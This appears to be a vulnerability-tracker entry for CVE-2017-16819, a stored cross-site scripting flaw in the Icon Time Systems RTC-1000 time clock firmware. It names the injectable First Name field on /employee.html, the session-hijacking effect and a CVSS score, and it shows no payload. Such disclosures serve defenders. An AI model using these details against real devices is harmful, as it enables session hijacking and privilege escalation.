Exploitation Summary
EIP tracks 1 public exploit for CVE-2017-16819. PoCs published by Keith Thome.
AI-analyzed exploit summary This is a writeup detailing a stored XSS vulnerability in Icon Time Systems RTC-1000 firmware <= v2.5.7458. The vulnerability allows an attacker with valid credentials to inject malicious scripts into the 'First Name' field of an employee record, which executes when the name is displayed on other pages.
Description
A stored cross-site scripting vulnerability in the Icon Time Systems RTC-1000 v2.5.7458 and earlier time clock allows remote attackers to inject arbitrary JavaScript in the nameFirst (aka First Name) field for the employee details page (/employee.html) that is then reflected in multiple pages where that field data is utilized, resulting in session hijacking and possible elevation of privileges.
Exploits (1)
This is a writeup detailing a stored XSS vulnerability in Icon Time Systems RTC-1000 firmware <= v2.5.7458. The vulnerability allows an attacker with valid credentials to inject malicious scripts into the 'First Name' field of an employee record, which executes when the name is displayed on other pages.
References (2)
Scores
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N